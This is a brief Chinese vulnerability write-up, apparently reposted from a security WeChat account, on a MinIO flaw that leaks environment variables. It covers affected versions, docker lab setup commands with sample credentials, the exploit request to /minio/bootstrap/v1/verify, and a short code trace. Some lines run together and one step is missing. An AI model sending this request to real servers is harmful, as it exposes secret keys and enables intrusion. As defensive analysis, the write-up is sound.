MinIO是基于GNU Affero通用公共许可证v3.0发布的高性能对象存储。兼容Amazon S3云存储服务的API。使用MinIO为机器学习、分析和应用程序数据工作负载构建高性能基础设施。
RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
192.168.31.254 minio-1192.168.31.231 minio-2
docker pull minio/minio:RELEASE.2023-03-13T19-46-17Z docker run -d --name minio-01 --restart=always --net=host -e MINIO_ACCESS_KEY=minio -e MINIO_SECRET_KEY=minio123 -v /root/minio/update:/data1 -v /root/minio/bakup:/data2 minio/minio:RELEASE.2023-03-13T19-46-17Z server --address 192.168.31.254:9000 http://minio-{1...3}/data{1...2}docker run -d --name minio-02 --restart=always --net=host -e MINIO_ACCESS_KEY=minio -e MINIO_SECRET_KEY=minio123 -v /root/minio/update:/data1 -v /root/minio/bakup:/data2 minio/minio:RELEASE.2023-03-13T19-46-17Z server --address 192.168.31.231:9000 http://minio-{1...3}/data{1...2}
POST /minio/bootstrap/v1/verify HTTP/1.1Host: 192.168.xx.xx:9000
1. 查看/cmd/bootstrap-peer-server.go中的路由信息,看到接口/minio/bootstrap/v1/verify对应的函数是VerifyHandler
3. 跟进getServerSystemCfg,作用是读取环境变量,然后将其返回
参考链接:
https://github.com/AbelChe/evil_minio
https://www.h3c.com/cn/d_202304/1830808_30003_0.htm
推荐服务
回复【1】领取新人学习资料
回复【2】进入漏洞查询功能
回复【3】获取加群方式
回复【4】领取安全电子书籍
文章引用微信公众号"Timeline Sec",如有侵权,请联系管理员删除!